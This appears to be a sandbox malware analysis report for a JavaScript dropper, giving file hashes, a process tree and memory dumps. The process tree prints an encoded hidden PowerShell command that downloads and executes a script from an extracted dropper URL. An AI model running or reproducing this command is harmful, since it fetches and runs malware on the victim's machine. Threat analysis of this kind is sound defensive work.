Overview

overview

10

Static

static

1

07f6912b1b...c00.js

windows7-x64

10

07f6912b1b...c00.js

windows10-2004-x64

10

Analysis

  • max time kernel
    0s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    25-12-2023 05:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    07f6912b1b86f7dfbb08804fa1dbec00.js

  • Size

    99KB

  • MD5

    07f6912b1b86f7dfbb08804fa1dbec00

  • SHA1

    8680b4a4b3a05469489a8be8fb320ec33b4dab9b

  • SHA256

    fa66e2f02f1f3c4817ced645ab21a716452d1eaa13501c7517d0adbab5e7bcb4

  • SHA512

    49650c2a28fee4880354fe45c63c6e41bac5b1253b5430da436a685726d95c7621dbe97bf2af892860ff256933918240b3af3dcffe9afaca02a8db3a46613afd

  • SSDEEP

    3072:59Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kV8Gd5bzIvt/4g5eaXU:59Ry9RuXqW4SzUHmLKeMMU7GwWBPwVGD

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://smart-integrator.hr/pornhub.php

Signatures

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\07f6912b1b86f7dfbb08804fa1dbec00.js
    1⤵
      PID:1244
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
        2⤵
          PID:2712
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
            3⤵
              PID:2852

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2852-5-0x000000001B690000-0x000000001B972000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/2852-8-0x0000000002BB0000-0x0000000002C30000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2852-9-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2852-11-0x0000000002BB0000-0x0000000002C30000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2852-10-0x0000000002BB0000-0x0000000002C30000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2852-7-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2852-6-0x0000000001E80000-0x0000000001E88000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2852-12-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

          Filesize

          9.6MB

          Download